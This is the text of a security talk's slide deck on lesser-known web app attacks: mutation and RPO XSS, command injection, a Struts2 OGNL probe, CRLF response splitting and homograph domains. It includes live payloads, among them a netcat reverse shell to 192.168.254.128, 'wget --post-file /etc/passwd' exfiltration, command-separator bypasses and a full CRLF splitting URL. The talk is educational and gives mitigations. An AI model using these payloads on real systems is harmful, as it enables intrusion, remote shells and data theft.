Null 14 may_lesser_known_attacks_by_ninadsarang

Lesser
Known
Attacks
Webapp
By Ninad Sarang

LesserKnownWebAppAttacks
About me 
 Consultant atAujas Networks
 Part time bug hunter
 Individual Security researcher
 Blogger
http://infinite8security.blogspot.in

Menu Card
Cross site scripting –
 Mutation XSS
 RPO XSS
 Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack

It’s all about PoPuP
Cross site Scripting-
Mutation XSS

 HTML encoded payload
<listing><img src=1 onerror=alert(1)></listing>
 we will put this piece of code into another code using innerHTML
property.
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
 When this code will execute, browser will read innerHTML and call
document.getElementById(‘x’)
 Resulting in multiple level of decoding and mutate from safe to
unsafe state.

Mitigation:
Server-side mitigation
• Avoiding outputting server content otherwise
incorrectly converted by the browser.
• The flawed content should be replaced with
semantically equivalent content which is converted
properly by the browser.
Client-side mitigation
• Browsers should implement ECMA Script 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM
object provided by all of the user agents.
• https://cure53.de/fp170.pdf

RPO XSS
Relative path Overwrite xss
• Difference between Absolute and Relative url
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this findings three things are necessary,
1) stored XSS that allows CSS injection.
2) URL Rewriting.
3) Relative addressing to CSS style sheet.

D
E
M
O
• Step 1: Lets visit
www.webdevelopersnotes.com/graphics/index.php3
• To check URL re-writing add ‘/’
• Open re-writed url with xss payloadin IE
and see the Magic ;)
• http://challenge.hackvertor.co.uk/
xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs should be used
throughout a site.
• Otherwise relative root url should be used.

Zombie XSS

Cross site Scripting- Zombie XSS

www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Remote/OS Command Execution

Now what if ( ; ) is blocked by the application?
 X ;Y = Seperating Commands (Run X and
then Y, regardless of success of X)
 X |Y = PIPE (Run X and pass output of X toY)
 X ^Y = PIPEZ
 X &&Y =AND (RunYif X succeeded )
 FAIL||Y = OR (RunYif X failed)
 X %0D Y%0D Z = OR
 ` X ` = Backtick
 ` X &Y` = Background (RunYand then run X in
background, regardless of success of X)
 $( command )
 nc -e /bin/sh = Netcat
 wget --post-file /etc/passwd = WGET

RCE never dies!!!
• "action:", "redirect:" or "redirectAction:" is not
properly sanitized.
• information will be evaluated as OGNL (Object-Graph
Navigation Language) expression against the value stack,
this introduces the possibility to inject server side code.
Apache struts2 RCE
http://host/struts2-
blank/example/X.action?action:${3*4}

D
E
M
O

Divide and Conquer cR-LFAttack
• CR stands for Carriage Return (CR,ASCII 13, r)
• LF stands for Line feed (LF, ASCII 10, n)
How this Attack work?
The server script embeds user data in HTTP response headers.
Example: Step1: There is redirection page “redir_lang.jsp”
When we hit index page server responds with following response
<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>

Divide and Conquer cR-LFAttack

Lets Attack ;)
Step 3: Instead of passing value as English. Lets pass our attack
vector as shown.
/redir_lang.jsp?lang=foobar%0d%0aContentLength
:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont
entType:%20text/html%0d%0aContentLength:%2019%
0d%0a%0d%0a<html>Shazam</html>
Note: We have URLencoded the CRLF sequences
Lets see what server responds with 

A first HTTP
response, which
is a 302
(redirection)
response.
A second HTTP
response, which is a
200 response, with a
content comprising
of 19 bytes of HTML.
Superfluous data

So when the attacker feeds the target with two requests, the first
being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%
0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont
entLength:%2019%0d%0a%0d%0a<html>Shazam</html>
And the second to the URL > /index.html
The target would believe that the first request is matched to the
first response:
And the second request (to /index.html) is matched to the second
response:

What Attacker can do by
CRLF attack?
 Cross site scripting >>
http://blog.innerht.ml/twitter-crlf-injection
 Web Cache Poisoning (defacement)
 Cross User attacks (single user, single page, temporary
defacement)
 Hijacking pages with user-specific information
 Browser cache poisoning

Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/

https://ebаy.com/
https://ebay.com/

What is this all about?
http://ebаy.com/
Decoding to punycode
http://xn--eby-7cd.com/
Cyrillic alphabets

What Attacker can do by
Homograph attack?
 Phishing
 Un-validated Redirection
 Fake websites
 Attacker may combine this with SSLattacks
http://www.blackhat.com/presentations/bh-dc-
09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

Mitigation
Before After

Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad

Null 14 may_lesser_known_attacks_by_ninadsarang

More Related Content

What's hot

Viewers also liked

Similar to Null 14 may_lesser_known_attacks_by_ninadsarang

Recently uploaded

Null 14 may_lesser_known_attacks_by_ninadsarang